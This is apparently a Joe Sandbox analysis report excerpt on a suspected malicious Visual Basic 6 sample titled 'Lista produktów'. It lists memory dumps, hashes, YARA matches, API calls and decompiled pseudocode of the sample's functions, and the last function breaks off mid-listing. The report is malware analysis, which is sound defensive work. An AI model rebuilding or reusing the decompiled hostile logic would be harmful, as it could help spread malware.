                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 4211a8b13cb5a03b99393e97fb5f05f8aa6699327dea4a784de2692920dbf2aa
                  • Instruction ID: e2ef045f04a7ef4f914fe40045dbe9312fff5e6d1d9282fb5b22ca9b7b84ad95
                  • Opcode Fuzzy Hash: 4211a8b13cb5a03b99393e97fb5f05f8aa6699327dea4a784de2692920dbf2aa
                  • Instruction Fuzzy Hash: A0310462F19B5189FF352068C9E457D6502DB92341F33863BCDAA73CC51A3E1AC2269B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualAlloc.KERNELBASE(-0015EB41,00008000,-00000001000243A3,FFE81172), ref: 0040775A
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 4c19a3d13d2586d80cc479228ecea574a31d6a3adfc4845765ef646fa3922d80
                  • Instruction ID: 119c0e4d5293e96035be259592eea929490109dbbe2b0fa615fb94458560f716
                  • Opcode Fuzzy Hash: 4c19a3d13d2586d80cc479228ecea574a31d6a3adfc4845765ef646fa3922d80
                  • Instruction Fuzzy Hash: BE110B72F18B1045FF753174C9E457D6012CB81382F32863BC91772CC56A3D1AC6669B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualAlloc.KERNELBASE(-0015EB41,00008000,-00000001000243A3,FFE81172), ref: 0040775A
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 0d8a7d25b81f7e0da7e097ea3b033bcec0974285829d66699d24c562e75006aa
                  • Instruction ID: 6358c9dda5d0c3c0788fe4e698052f47d0b53466e4a241c1b359710df31892a1
                  • Opcode Fuzzy Hash: 0d8a7d25b81f7e0da7e097ea3b033bcec0974285829d66699d24c562e75006aa
                  • Instruction Fuzzy Hash: B821D862F18B6149FF763064C9E457D6002DB91381F32863BCD6A33DC52A3D1AC2669B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Memory Dump Source
                  • Source File: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, Offset: 01D70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1d70000_Lista produkt#U00f3w.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 338cd700dafa85d28a21a5e6048444be05e774746d51bbc5070abe4758e59dac
                  • Instruction ID: c6a383a199cf7e2f287068a76fa4735f40791d7ca05321655cbe3ad344c7dbc9
                  • Opcode Fuzzy Hash: 338cd700dafa85d28a21a5e6048444be05e774746d51bbc5070abe4758e59dac
                  • Instruction Fuzzy Hash: AF220875700306AFEB259F28CC81BE577A1FF49750F148228FD88972D0E7B9E8559B90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, Offset: 01D70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1d70000_Lista produkt#U00f3w.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 48a696b7d2e043c66f55c1d75c2f528d2a8a44a069570125f8798bd606199034
                  • Instruction ID: a29d45689aac7dd562dadeab27c1e5541e96d4c76cb10b0536220b4a7406911a
                  • Opcode Fuzzy Hash: 48a696b7d2e043c66f55c1d75c2f528d2a8a44a069570125f8798bd606199034
                  • Instruction Fuzzy Hash: 3EB1F5743403467FFB210E28CD45BEA3A62FF49750F248228FE48AB1D0E7B99C989754
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, Offset: 01D70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1d70000_Lista produkt#U00f3w.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateMemoryVirtual
                  • String ID:
                  • API String ID: 2167126740-0
                  • Opcode ID: 7225ce9cde987dee87723e84a231c2bf4940d8c792584c2a9e85917153cd1595
                  • Instruction ID: 427e2caa23c81c427524ec1500eafbf3d07d190d4b5c75ec0834f5517d8bf182
                  • Opcode Fuzzy Hash: 7225ce9cde987dee87723e84a231c2bf4940d8c792584c2a9e85917153cd1595
                  • Instruction Fuzzy Hash: 1D81AA31B402866FFF3529288C94BEE2252EF96764F680519FE44A71E5FB39C4C5C622
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, Offset: 01D70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1d70000_Lista produkt#U00f3w.jbxd
                  Yara matches
                  Similarity
                  • API ID: MemoryProtectVirtual
                  • String ID:
                  • API String ID: 2706961497-0
                  • Opcode ID: 6658ee675f6920bbec426edf19c1f2665f5b4bc048cb6e138b2c2339fc3823fc
                  • Instruction ID: 438f8ee8ad25497a0a77584e2a881f1d52234d4b78806e71a5f8cdda001e185b
                  • Opcode Fuzzy Hash: 6658ee675f6920bbec426edf19c1f2665f5b4bc048cb6e138b2c2339fc3823fc
                  • Instruction Fuzzy Hash: BB91B524A44792DEDF25CF3CC8D8729B691AF16224F5882ADC9968F3E7D734C481D722
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
                  • Instruction ID: d394a65342a6a254380257ba0734a19f866dc21ad068f5b1ddaac111a7468d93
                  • Opcode Fuzzy Hash: 58187ee0e133b0b48bb3efed7ac890b15464e5e05c24970065dea5c804966976
                  • Instruction Fuzzy Hash: F641279025E2D4EFC71B47B64CBA2813FE1AE07108B1A88EFD6D54B8A3E555241FC727
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, Offset: 01D70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1d70000_Lista produkt#U00f3w.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0ba2c7ca9f9feec564bed2e14270e1cb2d84631ef4eb3f1548dee284e5260954
                  • Instruction ID: 2c062794e2dde2885cf056b157e7a26f9cbe3ce0ed8af47948da68ec9b3da9d9
                  • Opcode Fuzzy Hash: 0ba2c7ca9f9feec564bed2e14270e1cb2d84631ef4eb3f1548dee284e5260954
                  • Instruction Fuzzy Hash: 072168326443166FEB367E248C967EE3B62FF87750F640105FD48260E1E3BD9481C661
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
                  • Instruction ID: 0ef76ab4ed2bcdf07a831812e9108315abc5032b0251afc9fc56c28be75d868b
                  • Opcode Fuzzy Hash: 9e24cef5b52d058c6559a4647f5f96652dbae51e6763f7f5d8b23a4fe3d590a8
                  • Instruction Fuzzy Hash: 5E11DAB150E3E59FCB174B748CB52527FB0AF1B20070A44EBD4819F8A7E268281ED727
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, Offset: 01D70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1d70000_Lista produkt#U00f3w.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7d9720079b849dba400cdbbf8af391647b1446028a555134c1ba22bcdff7311e
                  • Instruction ID: 0fdc3d706dfac99ed7395811a23027f69a0166b873db950055938545173783e1
                  • Opcode Fuzzy Hash: 7d9720079b849dba400cdbbf8af391647b1446028a555134c1ba22bcdff7311e
                  • Instruction Fuzzy Hash: A811C234744385EEEB246F68DC9ABE4B7A0FF04740F944115ED859B2D1E7B0E880CA11
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, Offset: 01D70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1d70000_Lista produkt#U00f3w.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 840743c67f0bd0d27897af866c60fac6b062514697fcef8ec613a3bd75331dc4
                  • Instruction ID: fb452af6e357c16b789e1e037570ae66668ab0fba70182e94c94cd9c3ed66b79
                  • Opcode Fuzzy Hash: 840743c67f0bd0d27897af866c60fac6b062514697fcef8ec613a3bd75331dc4
                  • Instruction Fuzzy Hash: 0701A4B57803027EF7210A248D46FD57966BB81F44F318128FF083A1C4E3FA98495758
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
                  • Instruction ID: 3a4f40afd7daac755765d0dbc513794409bb1d663c47dbf88c845af7c1cdfe86
                  • Opcode Fuzzy Hash: 072463a7c437865975a3864d9424ff10385e28a77ccb1411e9edc6cac81fba01
                  • Instruction Fuzzy Hash: CBF07A70124154EFCB06CF74D8A5A063BE1AF5B3407451CDAD9108F475D736B865EB12
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, Offset: 01D70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1d70000_Lista produkt#U00f3w.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9fa056a3f69428cb5e79cee73a04be43d8af45d6f3c72fa794b1767a239001c8
                  • Instruction ID: 9d7ba46cc3f50b089adaa773bbce3f07c315836417aa7fc75a3a543f73d1626b
                  • Opcode Fuzzy Hash: 9fa056a3f69428cb5e79cee73a04be43d8af45d6f3c72fa794b1767a239001c8
                  • Instruction Fuzzy Hash: 42F092303016428FD714DB1CC9D4F5673B5EF69310F458665E941C7276E334EC40CA60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, Offset: 01D70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1d70000_Lista produkt#U00f3w.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
                  • Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
                  • Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
                  • Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.3167430661.0000000001D70000.00000040.00000001.sdmp, Offset: 01D70000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1d70000_Lista produkt#U00f3w.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                  • Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
                  • Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
                  • Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 54%
                  			E00410619(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12, intOrPtr _a23) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				void* _v28;
                  				intOrPtr _v32;
                  				void* _v36;
                  				void* _v40;
                  				signed int _v44;
                  				char _v48;
                  				char _v52;
                  				char _v56;
                  				void* _v64;
                  				void* _v72;
                  				void* _v80;
                  				void* _v88;
                  				void* _v96;
                  				void* _v104;
                  				void* _v112;
                  				void* _v120;
                  				void* _v128;
                  				void* _v136;
                  				void* _v144;
                  				void* _v152;
                  				void* _v172;
                  				signed int _v176;
                  				intOrPtr* _v180;
                  				signed int _v184;
                  				intOrPtr* _v188;
                  				signed int _v192;
                  				signed int _v204;
                  				void* _v208;
                  				void* _v212;
                  				intOrPtr* _v216;
                  				signed int _v220;
                  				signed int _v224;
                  				intOrPtr* _v228;
                  				signed int _v232;
                  				intOrPtr* _v236;
                  				signed int _v240;
                  				signed int _v244;
                  				void* _v248;
                  				void* _v252;
                  				void* _v256;
                  				void* _v260;
                  				signed int _t174;
                  				short _t180;
                  				signed int _t186;
                  				signed int _t191;
                  				char* _t196;
                  				signed int _t200;
                  				signed int _t206;
                  				signed int _t210;
                  				intOrPtr _t258;
                  				void* _t273;
                  				void* _t275;
                  				intOrPtr _t276;
                  
                  				_t276 = _t275 - 0xc;
                  				 *[fs:0x0] = _t276;
                  				L004011F0();
                  				_v16 = _t276;
                  				_v12 = 0x4011a8;
                  				_v8 = 0;
                  				_t174 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4011f6, _t273);
                  				L0040136A();
                  				_push(1);
                  				_push(0x402fe0);
                  				_push(0x402fe0);
                  				L004013BE();
                  				L004013B2();
                  				_push(_t174);
                  				L004012C2();
                  				L004013B2();
                  				_push(_t174);
                  				_push(0x402fe0);
                  				L004012C8();
                  				asm("sbb eax, eax");
                  				_v172 =  ~( ~( ~_t174));
                  				_push( &_v48);
                  				_push( &_v44);
                  				_push(2);
                  				L0040131C();
                  				_t180 = _v172;
                  				if(_t180 != 0) {
                  					if( *0x4123c0 != 0) {
                  						_v216 = 0x4123c0;
                  					} else {
                  						_push(0x4123c0);
                  						_push(0x403004);
                  						L00401388();
                  						_v216 = 0x4123c0;
                  					}
                  					_v172 =  *_v216;
                  					_t186 =  *((intOrPtr*)( *_v172 + 0x14))(_v172,  &_v52);
                  					asm("fclex");
                  					_v176 = _t186;
                  					if(_v176 >= 0) {
                  						_v220 = _v220 & 0x00000000;
                  					} else {
                  						_push(0x14);
                  						_push(0x402ff4);
                  						_push(_v172);
                  						_push(_v176);
                  						L00401394();
                  						_v220 = _t186;
                  					}
                  					_v180 = _v52;
                  					_t191 =  *((intOrPtr*)( *_v180 + 0xe0))(_v180,  &_v44);
                  					asm("fclex");
                  					_v184 = _t191;
                  					if(_v184 >= 0) {
                  						_v224 = _v224 & 0x00000000;
                  					} else {
                  						_push(0xe0);
                  						_push(0x403014);
                  						_push(_v180);
                  						_push(_v184);
                  						L00401394();
                  						_v224 = _t191;
                  					}
                  					_v204 = _v44;
                  					_v44 = _v44 & 0x00000000;
                  					_t258 = _v204;
                  					L004013B2();
                  					L00401382();
                  					if( *0x412010 != 0) {
                  						_v228 = 0x412010;
                  					} else {
                  						_push("(RO");
                  						_push(0x40246c);
                  						L00401388();
                  						_v228 = 0x412010;
                  					}
                  					_t196 =  &_v52;
                  					L00401358();
                  					_v172 = _t196;
                  					_t200 =  *((intOrPtr*)( *_v172 + 0x48))(_v172,  &_v44, _t196,  *((intOrPtr*)( *((intOrPtr*)( *_v228)) + 0x30c))( *_v228));
                  					asm("fclex");
                  					_v176 = _t200;
                  					if(_v176 >= 0) {
                  						_v232 = _v232 & 0x00000000;
                  					} else {
                  						_push(0x48);
                  						_push(0x403168);
                  						_push(_v172);
                  						_push(_v176);
                  						L00401394();
                  						_v232 = _t200;
                  					}
                  					if( *0x4123c0 != 0) {
                  						_v236 = 0x4123c0;
                  					} else {
                  						_push(0x4123c0);
                  						_push(0x403004);
                  						L00401388();
                  						_v236 = 0x4123c0;
                  					}
                  					_v180 =  *_v236;
                  					_t206 =  *((intOrPtr*)( *_v180 + 0x14))(_v180,  &_v56);
                  					asm("fclex");
                  					_v184 = _t206;
                  					if(_v184 >= 0) {
                  						_v240 = _v240 & 0x00000000;
                  					} else {
                  						_push(0x14);
                  						_push(0x402ff4);
                  						_push(_v180);
                  						_push(_v184);
                  						L00401394();
                  						_v240 = _t206;
                  					}
                  					_v188 = _v56;
                  					_t210 =  *((intOrPtr*)( *_v188 + 0x138))(_v188, _v44, 1);
                  					asm("fclex");
                  					_v192 = _t210;
                  					if(_v192 >= 0) {
                  						_v244 = _v244 & 0x00000000;
                  					} else {
                  						_push(0x138);
                  						_push(0x403014);
                  						_push(_v188);
                  						_push(_v192);
                  						L00401394();
                  						_v244 = _t210;
                  					}
                  					L00401364();
                  					_push( &_v56);
                  					_push( &_v52);
                  					_push(2);
                  					L0040134C();
                  					asm("les ecx, [ebx+eax*4]");
                  					_a23 = _a23 + _t258;
                  				}
                  				_v32 = 0x485fa3;
                  				_push(0x410c0e);
                  				L00401364();
                  				L00401364();
                  				L00401382();
                  				return _t180;
                  			}


                  APIs
                  • __vbaChkstk.MSVBVM60(?,004011F6), ref: 00410637
                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004011F6), ref: 00410661
                  • __vbaStrCat.MSVBVM60(00402FE0,00402FE0,00000001,?,?,?,?,004011F6), ref: 00410672
                  • __vbaStrMove.MSVBVM60(00402FE0,00402FE0,00000001,?,?,?,?,004011F6), ref: 0041067C
                  • #616.MSVBVM60(00000000,00402FE0,00402FE0,00000001,?,?,?,?,004011F6), ref: 00410682
                  • __vbaStrMove.MSVBVM60(00000000,00402FE0,00402FE0,00000001,?,?,?,?,004011F6), ref: 0041068C
                  • __vbaStrCmp.MSVBVM60(00402FE0,00000000,00000000,00402FE0,00402FE0,00000001,?,?,?,?,004011F6), ref: 00410697
                  • __vbaFreeStrList.MSVBVM60(00000002,00402FE0,00402FE0,00402FE0,00000000,00000000,00402FE0,00402FE0,00000001,?,?,?,?,004011F6), ref: 004106B5
                  • __vbaNew2.MSVBVM60(00403004,004123C0,?,?,004011F6), ref: 004106DF
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402FF4,00000014), ref: 00410741
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403014,000000E0), ref: 0041079D
                  • __vbaStrMove.MSVBVM60(00000000,?,00403014,000000E0), ref: 004107C7
                  • __vbaFreeObj.MSVBVM60(00000000,?,00403014,000000E0), ref: 004107CF
                  • __vbaNew2.MSVBVM60(0040246C,(RO), ref: 004107E7
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410820
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403168,00000048), ref: 00410864
                  • __vbaNew2.MSVBVM60(00403004,004123C0), ref: 0041088B
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402FF4,00000014), ref: 004108ED
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403014,00000138), ref: 0041094A
                  • __vbaFreeStr.MSVBVM60(00000000,?,00403014,00000138), ref: 00410961
                  • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00410970
                  • __vbaNew2.MSVBVM60(0040246C,(RO,?,?,?,?,?,004011F6), ref: 0041098B
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 004109C4
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403168,00000050), ref: 00410A08
                  • __vbaNew2.MSVBVM60(00403004,004123C0), ref: 00410A2F
                  • __vbaChkstk.MSVBVM60(?), ref: 00410ABD
                  • __vbaChkstk.MSVBVM60(?), ref: 00410AD1
                  • __vbaChkstk.MSVBVM60(?), ref: 00410AE5
                  • __vbaChkstk.MSVBVM60(?), ref: 00410AF6
                  • __vbaChkstk.MSVBVM60(?), ref: 00410B07
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402FF4,00000044), ref: 00410B4A
                  • __vbaChkstk.MSVBVM60(00000000,?,00402FF4,00000044), ref: 00410B7E
                  • __vbaLateIdSt.MSVBVM60(?,00000000), ref: 00410B91
                  • __vbaFreeObj.MSVBVM60(?,00000000), ref: 00410B99
                  • __vbaFreeVarList.MSVBVM60(00000002,00000008,00000009,?,00000000), ref: 00410BA8
                  • __vbaFreeStr.MSVBVM60(00410C0E), ref: 00410BF8
                  • __vbaFreeStr.MSVBVM60(00410C0E), ref: 00410C00
                  • __vbaFreeObj.MSVBVM60(00410C0E), ref: 00410C08
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: __vba$Free$CheckChkstkHresult$New2$ListMove$#616CopyLate
                  • String ID: (RO
                  • API String ID: 709077215-2817633693
                  • Opcode ID: 616164fadd98097fbc4bfed8f0a863bcc30ecb5f2947d3a91ddc1f49f9f9be98
                  • Instruction ID: 28d57b1b4e2b041cb69e3cba8c6e5e7c1691930446970aabda1e8d473d8c4b44
                  • Opcode Fuzzy Hash: 616164fadd98097fbc4bfed8f0a863bcc30ecb5f2947d3a91ddc1f49f9f9be98
                  • Instruction Fuzzy Hash: 25F14670900318EFDB20DFA1C945BDDBBB5BF09304F1040AAE909BB2A1D7B85AD49F59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __vbaNew2.MSVBVM60(0040246C,(RO,?,?,?,?,?,004011F6), ref: 0041098B
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 004109C4
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403168,00000050), ref: 00410A08
                  • __vbaNew2.MSVBVM60(00403004,004123C0), ref: 00410A2F
                  • __vbaChkstk.MSVBVM60(?), ref: 00410ABD
                  • __vbaChkstk.MSVBVM60(?), ref: 00410AD1
                  • __vbaChkstk.MSVBVM60(?), ref: 00410AE5
                  • __vbaChkstk.MSVBVM60(?), ref: 00410AF6
                  • __vbaChkstk.MSVBVM60(?), ref: 00410B07
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402FF4,00000044), ref: 00410B4A
                  • __vbaChkstk.MSVBVM60(00000000,?,00402FF4,00000044), ref: 00410B7E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: __vba$Chkstk$CheckHresultNew2
                  • String ID: (RO
                  • API String ID: 3535372409-2817633693
                  • Opcode ID: 5257360313e534e33858a43a1890e6df24cae7f9ad2a4105235e79355f173a39
                  • Instruction ID: 98c73b30c2f382c11d38a88712cfbaaea9eeadb122e3cc0462137c722bdf7083
                  • Opcode Fuzzy Hash: 5257360313e534e33858a43a1890e6df24cae7f9ad2a4105235e79355f173a39
                  • Instruction Fuzzy Hash: 60616D31900318DFDB21DFA1C945BDDBBB2BF09304F1044AAFA08BB292D7B95A859F55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 48%
                  			E0041107C(void* __eax) {
                  				intOrPtr _t51;
                  				void* _t53;
                  				short _t57;
                  				intOrPtr _t72;
                  				void* _t77;
                  				void* _t89;
                  				void* _t90;
                  
                  				L0:
                  				while(1) {
                  					L0:
                  					_t51 = _t89 - 0x24;
                  					_push(_t51);
                  					L0040128C();
                  					 *((intOrPtr*)(_t89 - 0x124)) = _t51;
                  					L2:
                  					if( *((intOrPtr*)(_t89 - 0x124)) != 0) {
                  						L1:
                  						 *((intOrPtr*)(_t89 - 0x80)) = 1;
                  						 *((intOrPtr*)(_t89 - 0x88)) = 2;
                  						_push(_t89 - 0x88);
                  						_t53 = _t89 - 0x24;
                  						_push(_t53);
                  						L00401346();
                  						_push(_t53);
                  						_push(_t89 - 0x74);
                  						_push(_t89 - 0x98);
                  						L00401292();
                  						_push(_t89 - 0x98);
                  						_t57 = _t89 - 0x78;
                  						_push(_t57);
                  						L00401298();
                  						_push(_t57);
                  						L0040129E();
                  						 *((short*)(_t89 - 0xa0)) = _t57;
                  						 *((intOrPtr*)(_t89 - 0xa8)) = 2;
                  						_push(_t89 - 0xa8);
                  						_push(_t89 - 0xb8);
                  						L004012A4();
                  						_push(_t89 - 0x34);
                  						_push(_t89 - 0xb8);
                  						_push(_t89 - 0xc8);
                  						L0040133A();
                  						L00401340();
                  						L00401364();
                  						_push(_t89 - 0xb8);
                  						_push(_t89 - 0xa8);
                  						_push(_t89 - 0x98);
                  						_push(_t89 - 0x88);
                  						_push(4);
                  						L004013B8();
                  						_t90 = _t90 + 0x14;
                  						_push(_t89 - 0x118);
                  						continue;
                  					}
                  					L3:
                  					 *((intOrPtr*)(_t89 - 0x90)) = 0x80020004;
                  					 *((intOrPtr*)(_t89 - 0x98)) = 0xa;
                  					 *((intOrPtr*)(_t89 - 0xd0)) = 0x403228;
                  					 *((intOrPtr*)(_t89 - 0xd8)) = 8;
                  					_push(1);
                  					_push(1);
                  					_push(_t89 - 0x98);
                  					_push(_t89 - 0xd8);
                  					_push(_t89 - 0x34);
                  					_t72 = _t89 - 0x88;
                  					_push(_t72);
                  					L0040133A();
                  					_push(_t72);
                  					L00401286();
                  					 *((intOrPtr*)(_t89 - 0xa0)) = _t72;
                  					 *((intOrPtr*)(_t89 - 0xa8)) = 8;
                  					L00401340();
                  					_push(_t89 - 0x98);
                  					_push(_t89 - 0x88);
                  					_push(2);
                  					L004013B8();
                  					L4:
                  					_push(0x4111ac);
                  					L5:
                  					_push(_t89 - 0x118);
                  					_push(_t89 - 0x108);
                  					_t77 = _t89 - 0xf8;
                  					_push(_t77);
